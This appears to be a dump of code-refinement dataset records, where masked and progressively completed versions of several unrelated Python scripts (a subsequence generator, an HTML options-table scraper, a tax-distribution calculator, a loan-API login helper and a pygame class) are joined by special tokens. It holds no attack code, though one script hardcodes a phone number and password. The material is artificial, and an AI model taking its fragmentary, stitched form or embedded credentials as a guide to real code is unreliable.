"step-3": "def get_all_lefts(word, substring):\n if len(substring) == 0:\n yield (len(word), word),\n elif substring[0] not in word:\n yield -1,\n else:\n for i in range(len(word)):\n if word[i] == substring[0]:\n for sub_sequance in get_all_lefts(word[i + 1:], substring[1:]):\n yield (i, word[:i]), *sub_sequance\n\n\nif __name__ == '__main__':\n word = input('')\n substring = input('')\n maxNum = 0\n for lefts in map(list, get_all_lefts(word, substring)):\n if -1 in lefts:\n continue\n print(lefts)\n print(maxNum)\n",
"step-4": "def get_all_lefts(word,substring):\n if len(substring) == 0:\n yield ((len(word),word),)\n else:\n if substring[0] not in word:\n yield (-1,)\n else:\n for i in range(len(word)):\n if word[i] == substring[0]:\n for sub_sequance in get_all_lefts(word[i+1:],substring[1:]):\n yield ((i,word[:i]),*sub_sequance)\n\nif __name__ == '__main__':\n word = input('')\n substring = input('')\n maxNum = 0\n for lefts in map(list,get_all_lefts(word,substring)):\n if -1 in lefts:\n continue\n print(lefts)\n print(maxNum)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if os.path.exists(Result_File):
os.remove(Result_File)
<|reserved_special_token_0|>
with open(Result_File, 'w') as r:
r.write(
'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'
)
for rows in main_table.find_all('tr'):
for cell in rows.find_all('td'):
if len(cell.text) != 0:
cell_text = cell.text.strip()
a = re.sub('\\n', '', cell_text, 0)
r.write(a)
r.write('|')
r.write('\n')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
Result_File = 'report.txt'
if os.path.exists(Result_File):
os.remove(Result_File)
f = codecs.open('test.html', 'r', 'utf-8')
xhtml = f.read()
data = []
soup = BeautifulSoup(xhtml, 'html.parser')
main_table = soup.find('table', {'id': 'octable'})
with open(Result_File, 'w') as r:
r.write(
'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'
)
for rows in main_table.find_all('tr'):
for cell in rows.find_all('td'):
if len(cell.text) != 0:
cell_text = cell.text.strip()
a = re.sub('\\n', '', cell_text, 0)
r.write(a)
r.write('|')
r.write('\n')
<|reserved_special_token_1|>
import requests
import codecs
import urllib.request
import time
from bs4 import BeautifulSoup
from html.parser import HTMLParser
import re
import os
Result_File = 'report.txt'
if os.path.exists(Result_File):
os.remove(Result_File)
f = codecs.open('test.html', 'r', 'utf-8')
xhtml = f.read()
data = []
soup = BeautifulSoup(xhtml, 'html.parser')
main_table = soup.find('table', {'id': 'octable'})
with open(Result_File, 'w') as r:
r.write(
'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'
)
for rows in main_table.find_all('tr'):
for cell in rows.find_all('td'):
if len(cell.text) != 0:
cell_text = cell.text.strip()
a = re.sub('\\n', '', cell_text, 0)
r.write(a)
r.write('|')
r.write('\n')
<|reserved_special_token_1|>
import requests
import codecs
import urllib.request
import time
from bs4 import BeautifulSoup
from html.parser import HTMLParser
import re
import os
#input
Result_File="report.txt"
#deleting result file if exists
if os.path.exists(Result_File):
os.remove(Result_File)
#reading html file and parsing logic
f=codecs.open("test.html", 'r', 'utf-8')
xhtml = f.read()
data = []
# instantiate the parser and feed data to it
soup = BeautifulSoup(xhtml,"html.parser")
#print(soup)
main_table = soup.find('table', { 'id': 'octable' })
#print(main_table)
with open(Result_File, 'w') as r:
r.write("OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE")
for rows in main_table.find_all('tr'):
for cell in rows.find_all('td'):
#print(data)
if(len(cell.text) != 0):
cell_text = cell.text.strip()
a = re.sub(r"\n", "", cell_text, 0)
r.write(a)
r.write("|")
r.write("\n")
|
flexible
|
{
"blob_id": "869bbc8da8cdb5de0bcaf5664b5482814daae53a",
"index": 6212,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif os.path.exists(Result_File):\n os.remove(Result_File)\n<mask token>\nwith open(Result_File, 'w') as r:\n r.write(\n 'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'\n )\n for rows in main_table.find_all('tr'):\n for cell in rows.find_all('td'):\n if len(cell.text) != 0:\n cell_text = cell.text.strip()\n a = re.sub('\\\\n', '', cell_text, 0)\n r.write(a)\n r.write('|')\n r.write('\\n')\n",
"step-3": "<mask token>\nResult_File = 'report.txt'\nif os.path.exists(Result_File):\n os.remove(Result_File)\nf = codecs.open('test.html', 'r', 'utf-8')\nxhtml = f.read()\ndata = []\nsoup = BeautifulSoup(xhtml, 'html.parser')\nmain_table = soup.find('table', {'id': 'octable'})\nwith open(Result_File, 'w') as r:\n r.write(\n 'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'\n )\n for rows in main_table.find_all('tr'):\n for cell in rows.find_all('td'):\n if len(cell.text) != 0:\n cell_text = cell.text.strip()\n a = re.sub('\\\\n', '', cell_text, 0)\n r.write(a)\n r.write('|')\n r.write('\\n')\n",
"step-4": "import requests\nimport codecs\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nfrom html.parser import HTMLParser\nimport re\nimport os\nResult_File = 'report.txt'\nif os.path.exists(Result_File):\n os.remove(Result_File)\nf = codecs.open('test.html', 'r', 'utf-8')\nxhtml = f.read()\ndata = []\nsoup = BeautifulSoup(xhtml, 'html.parser')\nmain_table = soup.find('table', {'id': 'octable'})\nwith open(Result_File, 'w') as r:\n r.write(\n 'OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE'\n )\n for rows in main_table.find_all('tr'):\n for cell in rows.find_all('td'):\n if len(cell.text) != 0:\n cell_text = cell.text.strip()\n a = re.sub('\\\\n', '', cell_text, 0)\n r.write(a)\n r.write('|')\n r.write('\\n')\n",
"step-5": "import requests\nimport codecs\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nfrom html.parser import HTMLParser\nimport re\nimport os\n\n#input\nResult_File=\"report.txt\"\n\n#deleting result file if exists\nif os.path.exists(Result_File):\n os.remove(Result_File)\n\n#reading html file and parsing logic\nf=codecs.open(\"test.html\", 'r', 'utf-8')\nxhtml = f.read()\ndata = []\n# instantiate the parser and feed data to it\nsoup = BeautifulSoup(xhtml,\"html.parser\")\n#print(soup)\nmain_table = soup.find('table', { 'id': 'octable' })\n#print(main_table)\nwith open(Result_File, 'w') as r:\n r.write(\"OI_CE|Chng_in_OI_CE |Volume_CE|IV_CE|LTP_CE|NetChng_CE|Bid_Qty_CE|Bid_Price_CE|Ask_Price_CE|Ask_Qty_CE|StrikePrice|Bid_Qty_PE|Bid_Price_PE|Ask_Price_PE|Ask_Qty_PE|Net_Chng_PE|LTP_PE|IV_PE|Volume_PE|Chng_in_OI_PE|OI_PE\")\n for rows in main_table.find_all('tr'):\n for cell in rows.find_all('td'):\n\n#print(data)\n if(len(cell.text) != 0):\n cell_text = cell.text.strip()\n a = re.sub(r\"\\n\", \"\", cell_text, 0)\n\n r.write(a)\n r.write(\"|\")\n r.write(\"\\n\")\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_incremental_factors():
import csv
inc_file = open(incremental_factors_file, 'r')
reader = csv.reader(inc_file)
increment_map = dict()
funding_code_map = dict()
this_trn_code = ''
for row in reader:
if row[0] != '':
this_trn_code = row[0].replace('-', '')
this_trn = increment_map.get(this_trn_code, {})
this_trn[int(row[1])] = float(row[3])
funding_code_map[int(row[1])] = row[2]
increment_map[this_trn_code] = this_trn
return increment_map, funding_code_map
<|reserved_special_token_0|>
apns.sort()
<|reserved_special_token_0|>
for apn in apns:
try:
tax_history_index = tax_history_apns.index(apn)
except:
tax_history_index = None
if tax_history_index is None:
print('No Matching APN: ' + apn)
else:
this_tax_history = tax_history[tax_history_index]
total_tax = this_tax_history[3]
tra = this_tax_history[1]
this_tra = increment_map.get(tra, None)
if this_tra is None:
print('TRA is Null for APN: ' + apn)
else:
fraction = this_tra.get(cabrillo_key, None)
if fraction is None:
print('APN: ' + apn + ' is not in district')
else:
tax_distribution += [[this_tax_history[0], this_tax_history
[1], this_tax_history[2], fraction, this_tax_history[3],
[(t * fraction) for t in this_tax_history[3]]]]
<|reserved_special_token_0|>
print('District Contributions: ')
<|reserved_special_token_0|>
for ds in district_sum:
print(str(year) + ': ' + str(ds))
year += 1
p.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,
'wb'))
<|reserved_special_token_1|>
incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'
tax_pickle_for_apns = 'kmes_taxes.p'
tax_history_pickle = '../cusd_1percent_tax_history.p'
distribution_pickle_out = 'kmes_distribution.p'
cabrillo_key = 50200
def read_incremental_factors():
import csv
inc_file = open(incremental_factors_file, 'r')
reader = csv.reader(inc_file)
increment_map = dict()
funding_code_map = dict()
this_trn_code = ''
for row in reader:
if row[0] != '':
this_trn_code = row[0].replace('-', '')
this_trn = increment_map.get(this_trn_code, {})
this_trn[int(row[1])] = float(row[3])
funding_code_map[int(row[1])] = row[2]
increment_map[this_trn_code] = this_trn
return increment_map, funding_code_map
increment_map, funding_code_map = read_incremental_factors()
<|reserved_special_token_0|>
tax_data_apns = p.load(open(tax_pickle_for_apns, 'rb'))
apns = list(set([d[0] for d in tax_data_apns]))
apns.sort()
tax_distribution = list()
tax_history = p.load(open(tax_history_pickle, 'rb'))
tax_history_apns = [d[0] for d in tax_history]
for apn in apns:
try:
tax_history_index = tax_history_apns.index(apn)
except:
tax_history_index = None
if tax_history_index is None:
print('No Matching APN: ' + apn)
else:
this_tax_history = tax_history[tax_history_index]
total_tax = this_tax_history[3]
tra = this_tax_history[1]
this_tra = increment_map.get(tra, None)
if this_tra is None:
print('TRA is Null for APN: ' + apn)
else:
fraction = this_tra.get(cabrillo_key, None)
if fraction is None:
print('APN: ' + apn + ' is not in district')
else:
tax_distribution += [[this_tax_history[0], this_tax_history
[1], this_tax_history[2], fraction, this_tax_history[3],
[(t * fraction) for t in this_tax_history[3]]]]
<|reserved_special_token_0|>
district_data = np.array(np.array([x[5] for x in tax_distribution]))
print('District Contributions: ')
district_sum = np.sum(district_data, axis=0)
year = 2007
for ds in district_sum:
print(str(year) + ': ' + str(ds))
year += 1
p.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,
'wb'))
<|reserved_special_token_1|>
incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'
tax_pickle_for_apns = 'kmes_taxes.p'
tax_history_pickle = '../cusd_1percent_tax_history.p'
distribution_pickle_out = 'kmes_distribution.p'
cabrillo_key = 50200
def read_incremental_factors():
import csv
inc_file = open(incremental_factors_file, 'r')
reader = csv.reader(inc_file)
increment_map = dict()
funding_code_map = dict()
this_trn_code = ''
for row in reader:
if row[0] != '':
this_trn_code = row[0].replace('-', '')
this_trn = increment_map.get(this_trn_code, {})
this_trn[int(row[1])] = float(row[3])
funding_code_map[int(row[1])] = row[2]
increment_map[this_trn_code] = this_trn
return increment_map, funding_code_map
increment_map, funding_code_map = read_incremental_factors()
import pickle as p
tax_data_apns = p.load(open(tax_pickle_for_apns, 'rb'))
apns = list(set([d[0] for d in tax_data_apns]))
apns.sort()
tax_distribution = list()
tax_history = p.load(open(tax_history_pickle, 'rb'))
tax_history_apns = [d[0] for d in tax_history]
for apn in apns:
try:
tax_history_index = tax_history_apns.index(apn)
except:
tax_history_index = None
if tax_history_index is None:
print('No Matching APN: ' + apn)
else:
this_tax_history = tax_history[tax_history_index]
total_tax = this_tax_history[3]
tra = this_tax_history[1]
this_tra = increment_map.get(tra, None)
if this_tra is None:
print('TRA is Null for APN: ' + apn)
else:
fraction = this_tra.get(cabrillo_key, None)
if fraction is None:
print('APN: ' + apn + ' is not in district')
else:
tax_distribution += [[this_tax_history[0], this_tax_history
[1], this_tax_history[2], fraction, this_tax_history[3],
[(t * fraction) for t in this_tax_history[3]]]]
import numpy as np
district_data = np.array(np.array([x[5] for x in tax_distribution]))
print('District Contributions: ')
district_sum = np.sum(district_data, axis=0)
year = 2007
for ds in district_sum:
print(str(year) + ': ' + str(ds))
year += 1
p.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,
'wb'))
<|reserved_special_token_1|>
incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'
tax_pickle_for_apns = 'kmes_taxes.p'
tax_history_pickle = '../cusd_1percent_tax_history.p'
distribution_pickle_out = 'kmes_distribution.p'
cabrillo_key = 50200
def read_incremental_factors():
import csv
inc_file = open(incremental_factors_file, 'r')
reader = csv.reader(inc_file)
increment_map = dict()
funding_code_map = dict()
this_trn_code = ''
for row in reader:
if row[0] != '':
this_trn_code = row[0].replace('-','')
this_trn = increment_map.get(this_trn_code,{})
this_trn[int(row[1])] = float(row[3])
funding_code_map[int(row[1])] = row[2]
increment_map[this_trn_code] = this_trn
return increment_map, funding_code_map
increment_map, funding_code_map = read_incremental_factors()
import pickle as p
tax_data_apns = p.load(open(tax_pickle_for_apns,'rb'))
apns = list(set([d[0] for d in tax_data_apns]))
apns.sort()
tax_distribution = list()
tax_history = p.load(open(tax_history_pickle,'rb'))
tax_history_apns = [d[0] for d in tax_history]
for apn in apns:
try:
tax_history_index = tax_history_apns.index(apn)
except:
tax_history_index = None
if tax_history_index is None:
print('No Matching APN: ' + apn)
else:
this_tax_history = tax_history[tax_history_index]
total_tax = this_tax_history[3]
tra = this_tax_history[1]
this_tra = increment_map.get(tra, None)
if this_tra is None:
print('TRA is Null for APN: ' + apn)
else:
fraction = this_tra.get(cabrillo_key, None)
if fraction is None:
print('APN: ' + apn + ' is not in district')
else:
tax_distribution += [[this_tax_history[0], this_tax_history[1], this_tax_history[2], fraction, this_tax_history[3], [t*fraction for t in this_tax_history[3]]]]
import numpy as np
district_data = np.array(np.array([x[5] for x in tax_distribution]))
print('District Contributions: ')
district_sum = np.sum(district_data, axis=0)
year = 2007
for ds in district_sum:
print(str(year) + ": " + str(ds))
year += 1
p.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,'wb'))
|
flexible
|
{
"blob_id": "18dae039f6455f944cbaa97bcb9c36ed29ac9a21",
"index": 867,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_incremental_factors():\n import csv\n inc_file = open(incremental_factors_file, 'r')\n reader = csv.reader(inc_file)\n increment_map = dict()\n funding_code_map = dict()\n this_trn_code = ''\n for row in reader:\n if row[0] != '':\n this_trn_code = row[0].replace('-', '')\n this_trn = increment_map.get(this_trn_code, {})\n this_trn[int(row[1])] = float(row[3])\n funding_code_map[int(row[1])] = row[2]\n increment_map[this_trn_code] = this_trn\n return increment_map, funding_code_map\n\n\n<mask token>\napns.sort()\n<mask token>\nfor apn in apns:\n try:\n tax_history_index = tax_history_apns.index(apn)\n except:\n tax_history_index = None\n if tax_history_index is None:\n print('No Matching APN: ' + apn)\n else:\n this_tax_history = tax_history[tax_history_index]\n total_tax = this_tax_history[3]\n tra = this_tax_history[1]\n this_tra = increment_map.get(tra, None)\n if this_tra is None:\n print('TRA is Null for APN: ' + apn)\n else:\n fraction = this_tra.get(cabrillo_key, None)\n if fraction is None:\n print('APN: ' + apn + ' is not in district')\n else:\n tax_distribution += [[this_tax_history[0], this_tax_history\n [1], this_tax_history[2], fraction, this_tax_history[3],\n [(t * fraction) for t in this_tax_history[3]]]]\n<mask token>\nprint('District Contributions: ')\n<mask token>\nfor ds in district_sum:\n print(str(year) + ': ' + str(ds))\n year += 1\np.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,\n 'wb'))\n",
"step-3": "incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'\ntax_pickle_for_apns = 'kmes_taxes.p'\ntax_history_pickle = '../cusd_1percent_tax_history.p'\ndistribution_pickle_out = 'kmes_distribution.p'\ncabrillo_key = 50200\n\n\ndef read_incremental_factors():\n import csv\n inc_file = open(incremental_factors_file, 'r')\n reader = csv.reader(inc_file)\n increment_map = dict()\n funding_code_map = dict()\n this_trn_code = ''\n for row in reader:\n if row[0] != '':\n this_trn_code = row[0].replace('-', '')\n this_trn = increment_map.get(this_trn_code, {})\n this_trn[int(row[1])] = float(row[3])\n funding_code_map[int(row[1])] = row[2]\n increment_map[this_trn_code] = this_trn\n return increment_map, funding_code_map\n\n\nincrement_map, funding_code_map = read_incremental_factors()\n<mask token>\ntax_data_apns = p.load(open(tax_pickle_for_apns, 'rb'))\napns = list(set([d[0] for d in tax_data_apns]))\napns.sort()\ntax_distribution = list()\ntax_history = p.load(open(tax_history_pickle, 'rb'))\ntax_history_apns = [d[0] for d in tax_history]\nfor apn in apns:\n try:\n tax_history_index = tax_history_apns.index(apn)\n except:\n tax_history_index = None\n if tax_history_index is None:\n print('No Matching APN: ' + apn)\n else:\n this_tax_history = tax_history[tax_history_index]\n total_tax = this_tax_history[3]\n tra = this_tax_history[1]\n this_tra = increment_map.get(tra, None)\n if this_tra is None:\n print('TRA is Null for APN: ' + apn)\n else:\n fraction = this_tra.get(cabrillo_key, None)\n if fraction is None:\n print('APN: ' + apn + ' is not in district')\n else:\n tax_distribution += [[this_tax_history[0], this_tax_history\n [1], this_tax_history[2], fraction, this_tax_history[3],\n [(t * fraction) for t in this_tax_history[3]]]]\n<mask token>\ndistrict_data = np.array(np.array([x[5] for x in tax_distribution]))\nprint('District Contributions: ')\ndistrict_sum = np.sum(district_data, axis=0)\nyear = 2007\nfor ds in district_sum:\n print(str(year) + ': ' + str(ds))\n year += 1\np.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,\n 'wb'))\n",
"step-4": "incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'\ntax_pickle_for_apns = 'kmes_taxes.p'\ntax_history_pickle = '../cusd_1percent_tax_history.p'\ndistribution_pickle_out = 'kmes_distribution.p'\ncabrillo_key = 50200\n\n\ndef read_incremental_factors():\n import csv\n inc_file = open(incremental_factors_file, 'r')\n reader = csv.reader(inc_file)\n increment_map = dict()\n funding_code_map = dict()\n this_trn_code = ''\n for row in reader:\n if row[0] != '':\n this_trn_code = row[0].replace('-', '')\n this_trn = increment_map.get(this_trn_code, {})\n this_trn[int(row[1])] = float(row[3])\n funding_code_map[int(row[1])] = row[2]\n increment_map[this_trn_code] = this_trn\n return increment_map, funding_code_map\n\n\nincrement_map, funding_code_map = read_incremental_factors()\nimport pickle as p\ntax_data_apns = p.load(open(tax_pickle_for_apns, 'rb'))\napns = list(set([d[0] for d in tax_data_apns]))\napns.sort()\ntax_distribution = list()\ntax_history = p.load(open(tax_history_pickle, 'rb'))\ntax_history_apns = [d[0] for d in tax_history]\nfor apn in apns:\n try:\n tax_history_index = tax_history_apns.index(apn)\n except:\n tax_history_index = None\n if tax_history_index is None:\n print('No Matching APN: ' + apn)\n else:\n this_tax_history = tax_history[tax_history_index]\n total_tax = this_tax_history[3]\n tra = this_tax_history[1]\n this_tra = increment_map.get(tra, None)\n if this_tra is None:\n print('TRA is Null for APN: ' + apn)\n else:\n fraction = this_tra.get(cabrillo_key, None)\n if fraction is None:\n print('APN: ' + apn + ' is not in district')\n else:\n tax_distribution += [[this_tax_history[0], this_tax_history\n [1], this_tax_history[2], fraction, this_tax_history[3],\n [(t * fraction) for t in this_tax_history[3]]]]\nimport numpy as np\ndistrict_data = np.array(np.array([x[5] for x in tax_distribution]))\nprint('District Contributions: ')\ndistrict_sum = np.sum(district_data, axis=0)\nyear = 2007\nfor ds in district_sum:\n print(str(year) + ': ' + str(ds))\n year += 1\np.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,\n 'wb'))\n",
"step-5": "incremental_factors_file = '../2019_2020_IncrementalFactorsList.csv'\ntax_pickle_for_apns = 'kmes_taxes.p'\ntax_history_pickle = '../cusd_1percent_tax_history.p'\ndistribution_pickle_out = 'kmes_distribution.p'\ncabrillo_key = 50200\n\ndef read_incremental_factors():\n import csv\n inc_file = open(incremental_factors_file, 'r')\n reader = csv.reader(inc_file)\n increment_map = dict()\n funding_code_map = dict()\n this_trn_code = ''\n for row in reader:\n if row[0] != '':\n this_trn_code = row[0].replace('-','')\n this_trn = increment_map.get(this_trn_code,{})\n this_trn[int(row[1])] = float(row[3])\n funding_code_map[int(row[1])] = row[2]\n increment_map[this_trn_code] = this_trn\n return increment_map, funding_code_map\n\nincrement_map, funding_code_map = read_incremental_factors()\nimport pickle as p\ntax_data_apns = p.load(open(tax_pickle_for_apns,'rb'))\napns = list(set([d[0] for d in tax_data_apns]))\napns.sort()\ntax_distribution = list()\ntax_history = p.load(open(tax_history_pickle,'rb'))\ntax_history_apns = [d[0] for d in tax_history]\n\nfor apn in apns:\n try:\n tax_history_index = tax_history_apns.index(apn)\n except:\n tax_history_index = None\n if tax_history_index is None:\n print('No Matching APN: ' + apn)\n else:\n this_tax_history = tax_history[tax_history_index]\n total_tax = this_tax_history[3]\n tra = this_tax_history[1]\n this_tra = increment_map.get(tra, None)\n if this_tra is None:\n print('TRA is Null for APN: ' + apn)\n else:\n fraction = this_tra.get(cabrillo_key, None)\n if fraction is None:\n print('APN: ' + apn + ' is not in district')\n else:\n tax_distribution += [[this_tax_history[0], this_tax_history[1], this_tax_history[2], fraction, this_tax_history[3], [t*fraction for t in this_tax_history[3]]]]\n\nimport numpy as np\n\ndistrict_data = np.array(np.array([x[5] for x in tax_distribution]))\n\nprint('District Contributions: ')\n\ndistrict_sum = np.sum(district_data, axis=0)\nyear = 2007\nfor ds in district_sum:\n print(str(year) + \": \" + str(ds))\n year += 1\n\np.dump([tax_distribution, funding_code_map], open(distribution_pickle_out,'wb'))\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def http_request(url, data, token=None, method='post'):
header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}
if method == 'get':
result = requests.get(url, json=data, headers=header)
else:
result = requests.post(url, json=data, headers=header)
return result.json()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def http_request(url, data, token=None, method='post'):
header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}
if method == 'get':
result = requests.get(url, json=data, headers=header)
else:
result = requests.post(url, json=data, headers=header)
return result.json()
if __name__ == '__main__':
login_url = 'http://120.78.128.25:8766/futureloan/member/login'
login_data = {'mobile_phone': 13665929730, 'pwd': '12345678'}
response = http_request(login_url, login_data)
print('登录的结果是:{}'.format(response))
token = response['data']['token_info']['token']
rec_url = 'http://120.78.128.25:8766/futureloan/member/recharge'
rec_data = {'member_id': 200170, 'amount': 123456}
print(http_request(rec_url, rec_data, 'bearer ' + token))
<|reserved_special_token_1|>
import requests
def http_request(url, data, token=None, method='post'):
header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}
if method == 'get':
result = requests.get(url, json=data, headers=header)
else:
result = requests.post(url, json=data, headers=header)
return result.json()
if __name__ == '__main__':
login_url = 'http://120.78.128.25:8766/futureloan/member/login'
login_data = {'mobile_phone': 13665929730, 'pwd': '12345678'}
response = http_request(login_url, login_data)
print('登录的结果是:{}'.format(response))
token = response['data']['token_info']['token']
rec_url = 'http://120.78.128.25:8766/futureloan/member/recharge'
rec_data = {'member_id': 200170, 'amount': 123456}
print(http_request(rec_url, rec_data, 'bearer ' + token))
<|reserved_special_token_1|>
# -coding: UTF-8 -*-
# @Time : 2020/06/24 20:01
# @Author: Liangping_Chen
# @E-mail: chenliangping_2018@foxmail.com
import requests
def http_request(url,data,token=None,method='post'):
header = {'X-Lemonban-Media-Type': 'lemonban.v2',
'Authorization':token}
#判断是get请求还是post请求
if method=='get':
# 发起注册&登录
result = requests.get(url, json=data, headers=header)
else:
result = requests.post(url, json=data, headers=header)
return result.json()#return返回指定的结果
if __name__ == '__main__':
login_url='http://120.78.128.25:8766/futureloan/member/login'
login_data={'mobile_phone':13665929730,'pwd':'12345678'}
response=http_request(login_url,login_data)
print('登录的结果是:{}'.format(response))
#充值
token=response['data']['token_info']['token']
rec_url='http://120.78.128.25:8766/futureloan/member/recharge'
rec_data = {'member_id': 200170, 'amount': 123456}
print(http_request(rec_url,rec_data,"bearer "+token))
|
flexible
|
{
"blob_id": "dd7c7fa6493a43988e1c8079797f6ff9b4d239dd",
"index": 4672,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef http_request(url, data, token=None, method='post'):\n header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}\n if method == 'get':\n result = requests.get(url, json=data, headers=header)\n else:\n result = requests.post(url, json=data, headers=header)\n return result.json()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef http_request(url, data, token=None, method='post'):\n header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}\n if method == 'get':\n result = requests.get(url, json=data, headers=header)\n else:\n result = requests.post(url, json=data, headers=header)\n return result.json()\n\n\nif __name__ == '__main__':\n login_url = 'http://120.78.128.25:8766/futureloan/member/login'\n login_data = {'mobile_phone': 13665929730, 'pwd': '12345678'}\n response = http_request(login_url, login_data)\n print('登录的结果是:{}'.format(response))\n token = response['data']['token_info']['token']\n rec_url = 'http://120.78.128.25:8766/futureloan/member/recharge'\n rec_data = {'member_id': 200170, 'amount': 123456}\n print(http_request(rec_url, rec_data, 'bearer ' + token))\n",
"step-4": "import requests\n\n\ndef http_request(url, data, token=None, method='post'):\n header = {'X-Lemonban-Media-Type': 'lemonban.v2', 'Authorization': token}\n if method == 'get':\n result = requests.get(url, json=data, headers=header)\n else:\n result = requests.post(url, json=data, headers=header)\n return result.json()\n\n\nif __name__ == '__main__':\n login_url = 'http://120.78.128.25:8766/futureloan/member/login'\n login_data = {'mobile_phone': 13665929730, 'pwd': '12345678'}\n response = http_request(login_url, login_data)\n print('登录的结果是:{}'.format(response))\n token = response['data']['token_info']['token']\n rec_url = 'http://120.78.128.25:8766/futureloan/member/recharge'\n rec_data = {'member_id': 200170, 'amount': 123456}\n print(http_request(rec_url, rec_data, 'bearer ' + token))\n",
"step-5": "# -coding: UTF-8 -*-\n# @Time : 2020/06/24 20:01\n# @Author: Liangping_Chen\n# @E-mail: chenliangping_2018@foxmail.com\n\nimport requests\ndef http_request(url,data,token=None,method='post'):\n header = {'X-Lemonban-Media-Type': 'lemonban.v2',\n 'Authorization':token}\n #判断是get请求还是post请求\n if method=='get':\n # 发起注册&登录\n result = requests.get(url, json=data, headers=header)\n else:\n result = requests.post(url, json=data, headers=header)\n\n return result.json()#return返回指定的结果\nif __name__ == '__main__':\n\n login_url='http://120.78.128.25:8766/futureloan/member/login'\n login_data={'mobile_phone':13665929730,'pwd':'12345678'}\n response=http_request(login_url,login_data)\n print('登录的结果是:{}'.format(response))\n\n #充值\n token=response['data']['token_info']['token']\n rec_url='http://120.78.128.25:8766/futureloan/member/recharge'\n rec_data = {'member_id': 200170, 'amount': 123456}\n print(http_request(rec_url,rec_data,\"bearer \"+token))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class BackGround:
def __init__(self, x, y):
self.y = y
self.x = x
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BackGround:
def __init__(self, x, y):
self.y = y
self.x = x
<|reserved_special_token_0|>
def draw(self, screen):
screen.blit(self.image, self.rect)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BackGround:
def __init__(self, x, y):
self.y = y
self.x = x
def set_image(self, src):
self.image = pygame.image.load(src)
self.rect = self.image.get_rect()
self.rect.y = self.y
self.rect.x = self.x
def draw(self, screen):
